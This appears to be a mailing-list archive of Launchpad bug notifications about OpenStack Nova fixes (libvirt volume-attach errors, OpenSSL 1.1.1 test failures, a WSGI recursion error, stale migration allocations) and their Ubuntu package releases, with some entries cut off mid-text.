pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary
[Yahoo-eng-team] [Bug 1826523] Re: libvirtError exceptions during volume attach leave volume connected to host
** Changed in: cloud-archive/rocky Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1826523 Title: libvirtError exceptions during volume attach leave volume connected to host Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Released Bug description: [Impact] Â * This is an additional patch required for bug #1825882, when a libvirt exception that prevents the volume attachment to complete, the underlying volumes should be disconnected from the host. [Test Case] * Deploy any OpenStack version up to Pike , which includes ceph backed cinder * Create a guest VM (openstack server ...) * Create a test cinder volume $ openstack volume create test --size 10 * Force a drop on ceph traffic. Run the following command on the nova hypervisor on which the server runs. $ iptables -A OUTPUT -d ceph-mon-addr -p tcp --dport 6800 -j DROP * Attach the volume to a running instance. $ openstack server add volume 7151f507-a6b7-4f6d-a4cc-fd223d9feb5d 742ff117-21ae-4d1b-a52b-5b37955716ff * This should cause the volume attachment to fail $ virsh domblklist instance-x Target Source vda nova/7151f507-a6b7-4f6d-a4cc-fd223d9feb5d_disk No volume should attached after this step. * If the behavior is fixed: Â Â Â * Check that openstack server show , doesn't displays the displays the volume as attached. * If the behavior isn't fixed: Â Â Â * openstack server show , will display the volume in the volumes_attached property. [Expected result] * Volume attach fails and the volume is disconnected from the host. [Actual result] * Volume attach fails but remains connected to the host. [Regression Potential] * The patches have been cherry-picked from upstream which helps to reduce the regression potential of these fixes. [Other Info] * N/A To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826523/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1771506] Re: Unit test failure with OpenSSL 1.1.1
** Changed in: cloud-archive/rocky Status: Fix Committed => Fix Released ** Changed in: cloud-archive/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1771506 Title: Unit test failure with OpenSSL 1.1.1 Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): In Progress Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Released Bug description: Hi, Building the Nova Queens package with OpenSSL 1.1.1 leads to unit test problems. This was reported to Debian at: https://bugs.debian.org/898807 The new openssl 1.1.1 is currently in experimental [0]. This package failed to build against this new package [1] while it built fine against the openssl version currently in unstable [2]. Could you please have a look? FAIL: nova.tests.unit.virt.xenapi.test_xenapi.XenAPIDiffieHellmanTestCase.test_encrypt_newlines_inside_message |nova.tests.unit.virt.xenapi.test_xenapi.XenAPIDiffieHellmanTestCase.test_encrypt_newlines_inside_message |-- |_StringException: pythonlogging:'': {{{2018-05-01 20:48:09,960 WARNING [oslo_config.cfg] Config option key_manager.api_class is deprecated. Use option key_manager.backend instead.}}} | |Traceback (most recent call last): | File "/<>/nova/tests/unit/virt/xenapi/test_xenapi.py", line 1592, in test_encrypt_newlines_inside_message |self._test_encryption('Message\nwith\ninterior\nnewlines.') | File "/<>/nova/tests/unit/virt/xenapi/test_xenapi.py", line 1577, in _test_encryption |enc = self.alice.encrypt(message) | File "/<>/nova/virt/xenapi/agent.py", line 432, in encrypt |return self._run_ssl(text).strip('\n') | File "/<>/nova/virt/xenapi/agent.py", line 428, in _run_ssl |raise RuntimeError(_('OpenSSL error: %s') % err) |RuntimeError: OpenSSL error: *** WARNING : deprecated key derivation used. |Using -iter or -pbkdf2 would be better. It looks like due to additional message on stderr. [0] https://lists.debian.org/msgid-search/20180501211400.ga21...@roeckx.be [1] https://breakpoint.cc/openssl-rebuild/2018-05-03-rebuild-openssl1.1.1-pre6/attempted/nova_17.0.0-4_amd64-2018-05-01T20%3A39%3A38Z [2] https://breakpoint.cc/openssl-rebuild/2018-05-03-rebuild-openssl1.1.1-pre6/successful/nova_17.0.0-4_amd64-2018-05-02T18%3A46%3A36Z To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1771506/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1808951] Re: python3 + Fedora + SSL + wsgi nova deployment, nova api returns RecursionError: maximum recursion depth exceeded while calling a Python object
** Changed in: cloud-archive/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1808951 Title: python3 + Fedora + SSL + wsgi nova deployment, nova api returns RecursionError: maximum recursion depth exceeded while calling a Python object Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in tripleo: Triaged Status in nova package in Ubuntu: Fix Released Status in nova source package in Disco: Fix Released Status in nova source package in Eoan: Fix Released Bug description: Description:- So while testing python3 with Fedora in [1], Found an issue while running nova-api behind wsgi. It fails with below Traceback:- 2018-12-18 07:41:55.364 26870 INFO nova.api.openstack.requestlog [req-e1af4808-ecd8-47c7-9568-a5dd9691c2c9 - - - - -] 127.0.0.1 "GET /v2.1/servers/detail?all_tenants=True&deleted=True" status: 500 len: 0 microversion: - time: 0.007297 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack [req-e1af4808-ecd8-47c7-9568-a5dd9691c2c9 - - - - -] Caught error: maximum recursion depth exceeded while calling a Python object: RecursionError: maximum recursion depth exceeded while calling a Python object 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack Traceback (most recent call last): 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/nova/api/openstack/__init__.py", line 94, in __call__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack return req.get_response(self.application) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/request.py", line 1313, in send 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack application, catch_exc_info=False) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/request.py", line 1277, in call_application 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack app_iter = application(self.environ, start_response) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/dec.py", line 129, in __call__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack resp = self.call_func(req, *args, **kw) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/dec.py", line 193, in call_func 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack return self.func(req, *args, **kwargs) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/nova/api/openstack/requestlog.py", line 92, in __call__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack self._log_req(req, res, start) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/oslo_utils/excutils.py", line 220, in __exit__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack self.force_reraise() 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/oslo_utils/excutils.py", line 196, in force_reraise 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack six.reraise(self.type_, self.value, self.tb) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/six.py", line 693, in reraise 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack raise value 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/nova/api/openstack/requestlog.py", line 87, in __call__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack res = req.get_response(self.application) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/request.py", line 1313, in send 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack application, catch_exc_info=False) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/request.py", line 1277, in call_application 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack app_iter = application(self.environ, start_response) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/dec.py", line 143, in __call__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack return resp(environ, start_response) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/dec.py", line 129, in __call__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack resp = self.call_func(req, *args, **kw) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack F
[Yahoo-eng-team] [Bug 1825882] Re: [SRU] Virsh disk attach errors silently ignored
** Changed in: cloud-archive/rocky Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1825882 Title: [SRU] Virsh disk attach errors silently ignored Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Released Bug description: [Impact] The following commit (1) is causing volume attachments which fail due to libvirt device attach erros to be silently ignored and Nova report the attachment as successful. It seems that the original intention of the commit was to log a condition and re-raise the exeption, but if the exception is of type libvirt.libvirtError and does not contain the searched pattern, the exception is ignored. If you unindent the raise statement, errors are reported again. In our case we had ceph/apparmor configuration problems in compute nodes which prevented virsh attaching the device; volumes appeared as successfully attached but the corresponding block device missing in guests VMs. Other libvirt attach error conditions are ignored also, as when you have already occuppied device names (i.e. 'Target vdb already exists', device is busy, etc.) (1) https://github.com/openstack/nova/commit/78891c2305bff6e16706339a9c5eca99a84e409c [Test Case] * Deploy any OpenStack version up to Pike , which includes ceph backed cinder * Create a guest VM (openstack server ...) * Create a test cinder volume $ openstack volume create test --size 10 * Force a drop on ceph traffic. Run the following command on the nova hypervisor on which the server runs. $ iptables -A OUTPUT -d ceph-mon-addr -p tcp --dport 6800 -j DROP * Attach the volume to a running instance. $ openstack server add volume 7151f507-a6b7-4f6d-a4cc-fd223d9feb5d 742ff117-21ae-4d1b-a52b-5b37955716ff * This should cause the volume attachment to fail $ virsh domblklist instance-x Target Source vda nova/7151f507-a6b7-4f6d-a4cc-fd223d9feb5d_disk No volume should attached after this step. * If the behavior is fixed: Â Â Â * Check that openstack server show , doesn't displays the displays the volume as attached. Â Â Â * Check that proper log entries states the libvirt exception and error. * If the behavior isn't fixed: Â Â Â * openstack server show , will display the volume in the volumes_attached property. [Expected result] * Volume attach fails and a proper exception is logged. [Actual result] * Volume attach fails but remains connected to the host and no further exception gets logged. [Regression Potential] * The patches have been cherry-picked from upstream which helps to reduce the regression potential of these fixes. [Other Info] * N/A Description To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1825882/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1821594] Re: [SRU] Error in confirm_migration leaves stale allocations and 'confirming' migration state
This bug was fixed in the package nova - 2:18.2.0-0ubuntu2~cloud0 --- nova (2:18.2.0-0ubuntu2~cloud0) bionic-rocky; urgency=medium . * New upstream release for the Ubuntu Cloud Archive. . nova (2:18.2.0-0ubuntu2) cosmic; urgency=medium . * Cherry-picked from upstream to ensure no stale allocations are left over on failed cold migrations (LP: #1821594). - d/p/bug_1821594_1.patch: Fix migration record status - d/p/bug_1821594_2.patch: Delete failed allocation part 1 - d/p/bug_1821594_3.patch: Delete failed allocation part 2 - d/p/bug_1821594_4.patch: New functional test . nova (2:18.2.0-0ubuntu1) cosmic; urgency=medium . [Sahid Orentino Ferdjaoui] * New stable point release for OpenStack Rocky (LP: #1830695). * d/p/ensure-rbd-auth-fallback-uses-matching-credentials.patch: Dropped. Fixed upstream in 18.2.0. . [Corey Bryant] * d/p/skip-openssl-1.1.1-tests.patch: Dropped as this is now properly fixed by xenapi-agent-change-openssl-error-handling.patch. ** Changed in: cloud-archive/rocky Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1821594 Title: [SRU] Error in confirm_migration leaves stale allocations and 'confirming' migration state Status in Ubuntu Cloud Archive: Triaged Status in Ubuntu Cloud Archive queens series: Triaged Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Triaged Status in Ubuntu Cloud Archive train series: Fix Committed Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) pike series: Triaged Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Committed Status in nova source package in Bionic: Triaged Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Triaged Status in nova source package in Eoan: Fix Committed Bug description: Description: When performing a cold migration, if an exception is raised by the driver during confirm_migration (this runs in the source node), the migration record is stuck in "confirming" state and the allocations against the source node are not removed. The instance is fine at the destination in this stage, but the source host has allocations that is not possible to clean without going to the database or invoking the Placement API via curl. After several migration attempts that fail in the same spot, the source node is filled with these allocations that prevent new instances from being created or instances migrated to this node. When confirm_migration fails in this stage, the migrating instance can be saved through a hard reboot or a reset state to active. Steps to reproduce: Unfortunately, I don't have logs of the real root cause of the problem inside driver.confirm_migration running libvirt driver. However, the stale allocations and migration status problem can be easily reproduced by raising an exception in libvirt driver's confirm_migration method, and it would affect any driver. Expected results: Discussed this issue with efried and mriedem over #openstack-nova on March 25th, 2019. They confirmed that allocations not being cleared up is a bug. Actual results: Instance is fine at the destination after a reset-state. Source node has stale allocations that prevent new instances from being created/migrated to the source node. Migration record is stuck in "confirming" state. Environment: I verified this bug on on pike, queens and stein branches. Running libvirt KVM driver. === [Impact] If users attempting to perform cold migrations face any issues when the virt driver is running the "Confirm Migration" step, the failure leaves stale allocation records in the database, in migration records in "confirming" state. The stale allocations are not cleaned up by nova, consuming the user's quota indefinitely. This bug was confirmed from pike to stein release, and a fix was implemented for queens, rocky and stein. It should be backported to those releases to prevent the issue from reoccurring. This fix prevents new stale allocations being left over, by cleaning them up immediately when the failures occur. At the moment, the users affected by this bug have to clean their previous stale allocations manually. [Test Case] 1. Reproducing the bug 1a. Inject failure The root cause for this problem may vary for each driver and environment, so to reproduce the bug, it is necessary first to inject a failure in t
[Yahoo-eng-team] [Bug 1771506] Re: Unit test failure with OpenSSL 1.1.1
** Changed in: cloud-archive/queens Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1771506 Title: Unit test failure with OpenSSL 1.1.1 Status in Ubuntu Cloud Archive: Fix Committed Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Committed Status in OpenStack Compute (nova): In Progress Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Committed Bug description: Hi, Building the Nova Queens package with OpenSSL 1.1.1 leads to unit test problems. This was reported to Debian at: https://bugs.debian.org/898807 The new openssl 1.1.1 is currently in experimental [0]. This package failed to build against this new package [1] while it built fine against the openssl version currently in unstable [2]. Could you please have a look? FAIL: nova.tests.unit.virt.xenapi.test_xenapi.XenAPIDiffieHellmanTestCase.test_encrypt_newlines_inside_message |nova.tests.unit.virt.xenapi.test_xenapi.XenAPIDiffieHellmanTestCase.test_encrypt_newlines_inside_message |-- |_StringException: pythonlogging:'': {{{2018-05-01 20:48:09,960 WARNING [oslo_config.cfg] Config option key_manager.api_class is deprecated. Use option key_manager.backend instead.}}} | |Traceback (most recent call last): | File "/<>/nova/tests/unit/virt/xenapi/test_xenapi.py", line 1592, in test_encrypt_newlines_inside_message |self._test_encryption('Message\nwith\ninterior\nnewlines.') | File "/<>/nova/tests/unit/virt/xenapi/test_xenapi.py", line 1577, in _test_encryption |enc = self.alice.encrypt(message) | File "/<>/nova/virt/xenapi/agent.py", line 432, in encrypt |return self._run_ssl(text).strip('\n') | File "/<>/nova/virt/xenapi/agent.py", line 428, in _run_ssl |raise RuntimeError(_('OpenSSL error: %s') % err) |RuntimeError: OpenSSL error: *** WARNING : deprecated key derivation used. |Using -iter or -pbkdf2 would be better. It looks like due to additional message on stderr. [0] https://lists.debian.org/msgid-search/20180501211400.ga21...@roeckx.be [1] https://breakpoint.cc/openssl-rebuild/2018-05-03-rebuild-openssl1.1.1-pre6/attempted/nova_17.0.0-4_amd64-2018-05-01T20%3A39%3A38Z [2] https://breakpoint.cc/openssl-rebuild/2018-05-03-rebuild-openssl1.1.1-pre6/successful/nova_17.0.0-4_amd64-2018-05-02T18%3A46%3A36Z To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1771506/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1826523] Re: libvirtError exceptions during volume attach leave volume connected to host
This bug was fixed in the package nova - 2:17.0.9-0ubuntu3~cloud0 --- nova (2:17.0.9-0ubuntu3~cloud0) xenial-queens; urgency=medium . * New update for the Ubuntu Cloud Archive. . nova (2:17.0.9-0ubuntu3) bionic; urgency=medium . * d/p/bug_1825882.patch: Cherry-picked from upstream to ensure virsh disk attach does not fail silently (LP: #1825882). * d/p/bug_1826523.patch: Cherry-picked from upstream to ensure always disconnect volumes after libvirt exceptions (LP: #1826523). ** Changed in: cloud-archive/queens Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1826523 Title: libvirtError exceptions during volume attach leave volume connected to host Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Committed Bug description: [Impact] Â * This is an additional patch required for bug #1825882, when a libvirt exception that prevents the volume attachment to complete, the underlying volumes should be disconnected from the host. [Test Case] * Deploy any OpenStack version up to Pike , which includes ceph backed cinder * Create a guest VM (openstack server ...) * Create a test cinder volume $ openstack volume create test --size 10 * Force a drop on ceph traffic. Run the following command on the nova hypervisor on which the server runs. $ iptables -A OUTPUT -d ceph-mon-addr -p tcp --dport 6800 -j DROP * Attach the volume to a running instance. $ openstack server add volume 7151f507-a6b7-4f6d-a4cc-fd223d9feb5d 742ff117-21ae-4d1b-a52b-5b37955716ff * This should cause the volume attachment to fail $ virsh domblklist instance-x Target Source vda nova/7151f507-a6b7-4f6d-a4cc-fd223d9feb5d_disk No volume should attached after this step. * If the behavior is fixed: Â Â Â * Check that openstack server show , doesn't displays the displays the volume as attached. * If the behavior isn't fixed: Â Â Â * openstack server show , will display the volume in the volumes_attached property. [Expected result] * Volume attach fails and the volume is disconnected from the host. [Actual result] * Volume attach fails but remains connected to the host. [Regression Potential] * The patches have been cherry-picked from upstream which helps to reduce the regression potential of these fixes. [Other Info] * N/A To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826523/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1825882] Re: [SRU] Virsh disk attach errors silently ignored
This bug was fixed in the package nova - 2:19.0.0-0ubuntu2.3~cloud0 --- nova (2:19.0.0-0ubuntu2.3~cloud0) bionic-stein; urgency=medium . * New update for the Ubuntu Cloud Archive. . nova (2:19.0.0-0ubuntu2.3) disco; urgency=medium . * d/p/bug_1825882.patch: Cherry-picked from upstream to ensure virsh disk attach does not fail silently (LP: #1825882). * d/p/bug_1826523.patch: Cherry-picked from upstream to ensure always disconnect volumes after libvirt exceptions (LP: #1826523). ** Changed in: cloud-archive/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1825882 Title: [SRU] Virsh disk attach errors silently ignored Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Committed Bug description: [Impact] The following commit (1) is causing volume attachments which fail due to libvirt device attach erros to be silently ignored and Nova report the attachment as successful. It seems that the original intention of the commit was to log a condition and re-raise the exeption, but if the exception is of type libvirt.libvirtError and does not contain the searched pattern, the exception is ignored. If you unindent the raise statement, errors are reported again. In our case we had ceph/apparmor configuration problems in compute nodes which prevented virsh attaching the device; volumes appeared as successfully attached but the corresponding block device missing in guests VMs. Other libvirt attach error conditions are ignored also, as when you have already occuppied device names (i.e. 'Target vdb already exists', device is busy, etc.) (1) https://github.com/openstack/nova/commit/78891c2305bff6e16706339a9c5eca99a84e409c [Test Case] * Deploy any OpenStack version up to Pike , which includes ceph backed cinder * Create a guest VM (openstack server ...) * Create a test cinder volume $ openstack volume create test --size 10 * Force a drop on ceph traffic. Run the following command on the nova hypervisor on which the server runs. $ iptables -A OUTPUT -d ceph-mon-addr -p tcp --dport 6800 -j DROP * Attach the volume to a running instance. $ openstack server add volume 7151f507-a6b7-4f6d-a4cc-fd223d9feb5d 742ff117-21ae-4d1b-a52b-5b37955716ff * This should cause the volume attachment to fail $ virsh domblklist instance-x Target Source vda nova/7151f507-a6b7-4f6d-a4cc-fd223d9feb5d_disk No volume should attached after this step. * If the behavior is fixed: Â Â Â * Check that openstack server show , doesn't displays the displays the volume as attached. Â Â Â * Check that proper log entries states the libvirt exception and error. * If the behavior isn't fixed: Â Â Â * openstack server show , will display the volume in the volumes_attached property. [Expected result] * Volume attach fails and a proper exception is logged. [Actual result] * Volume attach fails but remains connected to the host and no further exception gets logged. [Regression Potential] * The patches have been cherry-picked from upstream which helps to reduce the regression potential of these fixes. [Other Info] * N/A Description To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1825882/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1825882] Re: [SRU] Virsh disk attach errors silently ignored
This bug was fixed in the package nova - 2:17.0.9-0ubuntu3~cloud0 --- nova (2:17.0.9-0ubuntu3~cloud0) xenial-queens; urgency=medium . * New update for the Ubuntu Cloud Archive. . nova (2:17.0.9-0ubuntu3) bionic; urgency=medium . * d/p/bug_1825882.patch: Cherry-picked from upstream to ensure virsh disk attach does not fail silently (LP: #1825882). * d/p/bug_1826523.patch: Cherry-picked from upstream to ensure always disconnect volumes after libvirt exceptions (LP: #1826523). ** Changed in: cloud-archive/queens Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1825882 Title: [SRU] Virsh disk attach errors silently ignored Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Committed Bug description: [Impact] The following commit (1) is causing volume attachments which fail due to libvirt device attach erros to be silently ignored and Nova report the attachment as successful. It seems that the original intention of the commit was to log a condition and re-raise the exeption, but if the exception is of type libvirt.libvirtError and does not contain the searched pattern, the exception is ignored. If you unindent the raise statement, errors are reported again. In our case we had ceph/apparmor configuration problems in compute nodes which prevented virsh attaching the device; volumes appeared as successfully attached but the corresponding block device missing in guests VMs. Other libvirt attach error conditions are ignored also, as when you have already occuppied device names (i.e. 'Target vdb already exists', device is busy, etc.) (1) https://github.com/openstack/nova/commit/78891c2305bff6e16706339a9c5eca99a84e409c [Test Case] * Deploy any OpenStack version up to Pike , which includes ceph backed cinder * Create a guest VM (openstack server ...) * Create a test cinder volume $ openstack volume create test --size 10 * Force a drop on ceph traffic. Run the following command on the nova hypervisor on which the server runs. $ iptables -A OUTPUT -d ceph-mon-addr -p tcp --dport 6800 -j DROP * Attach the volume to a running instance. $ openstack server add volume 7151f507-a6b7-4f6d-a4cc-fd223d9feb5d 742ff117-21ae-4d1b-a52b-5b37955716ff * This should cause the volume attachment to fail $ virsh domblklist instance-x Target Source vda nova/7151f507-a6b7-4f6d-a4cc-fd223d9feb5d_disk No volume should attached after this step. * If the behavior is fixed: Â Â Â * Check that openstack server show , doesn't displays the displays the volume as attached. Â Â Â * Check that proper log entries states the libvirt exception and error. * If the behavior isn't fixed: Â Â Â * openstack server show , will display the volume in the volumes_attached property. [Expected result] * Volume attach fails and a proper exception is logged. [Actual result] * Volume attach fails but remains connected to the host and no further exception gets logged. [Regression Potential] * The patches have been cherry-picked from upstream which helps to reduce the regression potential of these fixes. [Other Info] * N/A Description To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1825882/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1826523] Re: libvirtError exceptions during volume attach leave volume connected to host
This bug was fixed in the package nova - 2:19.0.0-0ubuntu2.3~cloud0 --- nova (2:19.0.0-0ubuntu2.3~cloud0) bionic-stein; urgency=medium . * New update for the Ubuntu Cloud Archive. . nova (2:19.0.0-0ubuntu2.3) disco; urgency=medium . * d/p/bug_1825882.patch: Cherry-picked from upstream to ensure virsh disk attach does not fail silently (LP: #1825882). * d/p/bug_1826523.patch: Cherry-picked from upstream to ensure always disconnect volumes after libvirt exceptions (LP: #1826523). ** Changed in: cloud-archive/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1826523 Title: libvirtError exceptions during volume attach leave volume connected to host Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Committed Bug description: [Impact] Â * This is an additional patch required for bug #1825882, when a libvirt exception that prevents the volume attachment to complete, the underlying volumes should be disconnected from the host. [Test Case] * Deploy any OpenStack version up to Pike , which includes ceph backed cinder * Create a guest VM (openstack server ...) * Create a test cinder volume $ openstack volume create test --size 10 * Force a drop on ceph traffic. Run the following command 